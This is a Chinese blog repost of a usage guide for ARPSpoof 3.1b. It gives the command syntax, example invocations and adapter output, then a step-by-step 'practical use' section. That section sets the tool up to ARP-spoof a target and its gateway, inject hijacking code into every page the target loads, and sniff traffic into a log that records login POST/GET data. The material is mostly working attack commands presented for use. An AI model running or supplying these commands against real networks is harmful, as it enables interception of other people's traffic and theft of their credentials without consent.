ARPSpoof Ver 3.1b by CoolDiyer
Usage:
ArpSpoof <IP1> <IP2> <PORT> <AdpNum> <Mode> /[r|s] <File>
ArpSpoof /s <IP> <Mask>
ArpSpoof /l
Mode Options:
0 IP1 –> IP2
1 IP1 <-> IP2
Examples:
> ArpSpoof 192.168.0.1 192.168.0.8 80 2 1 /r job.txt
# Spoof 192.168.0.1 <-> 192.168.0.8:80 with rule(域名劫持)
> ArpSpoof 192.168.0.1 192.168.0.8 21 2 1 /s sniff.log
# Spoof 192.168.0.1 <-> 192.168.0.8:80 save to log(嗅探并保存到文件)
> ArpSpoof 192.168.0.1 192.168.0.8 80 2 0 /RESET
# Reset 192.168.0.1 –> 192.168.0.8:80(可能是重置)
> ArpSpoof /s 192.168.0.1 255.255.255.0
# Scan lan host(扫描内网主机)
> ArpSpoof /l
# Lists adapters(列出本机网卡信息)
> ArpSpoof /n
# Release a new replace rule file(生成一个劫持代码的文件)
使用实战:
ARPSpoof Ver 3.1b by CoolDiyer
0. TAP-Windows Adapter V9
IP Address. . . . . : 0.0.0.0
Physical Address. . : 00-FF-00-D3-2A-AC
Default Gateway . . : 0.0.0.0
1. TAP-Windows Adapter V9
IP Address. . . . . : 0.0.0.0
Physical Address. . : 00-FF-60-49-FF-D9
Default Gateway . . : 0.0.0.0
2. Intel(R) PRO/1000 MT Network Connection
IP Address. . . . . : 192.168.0.89
Physical Address. . : 00-1C-42-C5-A7-9D
Default Gateway . . : 192.168.0.1
2. 第二步:生成一个劫持代码的文件:arpspoof /n
会在当前程序下生成job.txt
3. 域名劫持功能
arpspoof 192.168.0.108 192.168.0.1 80 2 1 /r job.txt
目标ip 网关ip 80端口 第二块网卡 双向欺骗
最终当目标访问任意网站时,都会被劫持。(测试结果:https网站劫持未成功)
4. 嗅探数据功能
arpspoof 192.168.0.108 192.168.0.1 80 2 1 /s test.txt
会在当前目录下生成test.txt文件,里面会记录所有捕获的数据,包括网站源码以及登录时发送 的post get数据,不过垃圾数据较多,需要筛选。(测试结果:https网站劫持未成功)
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/188453.html原文链接:https://javaforall.cn